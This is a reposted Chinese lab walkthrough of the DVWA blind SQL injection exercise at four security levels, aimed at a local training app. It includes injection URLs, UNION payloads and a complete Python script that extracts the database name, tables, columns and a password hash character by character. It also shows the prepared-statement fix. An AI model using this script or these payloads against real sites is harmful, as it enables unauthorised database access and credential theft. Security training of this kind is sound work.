【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

1.初级篇 Low.php

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

加单引号提交

http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'&Submit=Submit#

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

输出用户id没有找到,加注释符正常,说明是单引号闭合

http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'%23&Submit=Submit#

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

构造如下注入,若database名第一个字符为’d’,即ascii码为100,页面正常

http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),1,1))=100%23&Submit=Submit#

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

反之页面不正常

http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),1,1))=99%23&Submit=Submit#

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

有一点需要注意,语句执行失败会直接返回 404 Not Found,所以猜解失败的时候会触发urllib2.HTTPError

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

 

编写一个python脚本很容易完成猜解工作

# -- coding: utf-8 --
# version: python 2.7
# file: sql-blind-injection.py  
# time: 2018.2.4
# author: superkrissV  

import urllib
import urllib2

# 必须携带正确的Cookie
headers={        
        'Host': 'localhost',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'Cookie': 'security=low; PHPSESSID=h8uq0bha6sphm17mik8kml9hd3',
        }

target_url = "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?Submit=Submit&id=1"
success_str = "User ID exists in the database."

length_payload = "' and length(%s)>=%d #"
char_payload = "' and ascii(substr(%s, %d, 1))>=%d #"

table_name = "(select table_name from information_schema.tables where table_schema='%s' limit %d,1)"
column_name = "(select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %d,1)"
column_data = "(select %s from %s.%s limit %d, 1)"

ascii_start = 33
ascii_end = 126

max_length = 50

# 构造对应的payload并发送
def sendRequest(payload):
    url = target_url + urllib.quote(payload)
#    print url
    try:
        request = urllib2.Request(url=url, headers=headers)
        response = urllib2.urlopen(request)
        if success_str in response.read():
            return True
        return False
    except urllib2.HTTPError as e:
        return False

# 利用递归和二分法获取长度
def getLength(start, end, command):
    if (start+1) == end:return start
    mid = (end+start) / 2
    if sendRequest(length_payload % (command, mid)):
        start = mid
    else:
        end = mid
#    print start,"    ",end
    result = getLength(start, end, command)
    return result

# 返回pos位置的字符的ascii码值
def getSingleChar(start, end, command, pos):
    if (start+1) == end:return start
    mid = (end+start) / 2
    if sendRequest(char_payload % (command, pos, mid)):
        start = mid
    else:
        end = mid
#    print start,"    ",end
    result = getSingleChar(start, end, command, pos)
    return result

def getInfo(command):
    pos = 1
    info = ""
    maxLen = getLength(1, max_length, command)
    print command, " length:", maxLen
    while(1):
        if pos > maxLen:break
        info += chr(getSingleChar(ascii_start, ascii_end, command, pos))
        pos += 1
        print info

getInfo("user()") # 14 root@localhost
getInfo("database()") # 4 dvwa
getInfo(table_name % ("dvwa",1)) # 5 users
getInfo(column_name % ("dvwa","users",1)) # 10 first_name
getInfo(column_name % ("dvwa","users",4)) # 8 password
getInfo(column_data % ("password", "dvwa", "users", 0)) # 32 5f4dcc3b5aa765d61d8327deb882cf99

2.中级篇 Medium.php

 《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

POST 提交

id=0 union select 1,2#&Submit=Submit

仍然显示存在,事实上id=0并不存在,但union select 返回了结果,程序只是单纯的判断结果集是否为空

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

和初级篇一样,猜字符

id=1 and ascii(substr(database(),1,1))=100#&Submit=Submit

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

3.高级篇 High.php

 《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

和上一章不同,这次是写入了cookie

http://localhost/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

刷新

http://localhost/DVWA-master/vulnerabilities/sqli_blind/

使用EditThisCookie查看cookie

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

可以直接在这个页面直接注入

0' union select 1,2#

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

刷新页面

《【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible》

4.不可能篇 Impossible.php

 查看源码就知道使用PDO,无法注入

    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
    原文作者:omnis
    原文地址: https://www.cnblogs.com/omnis/p/8406783.html
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞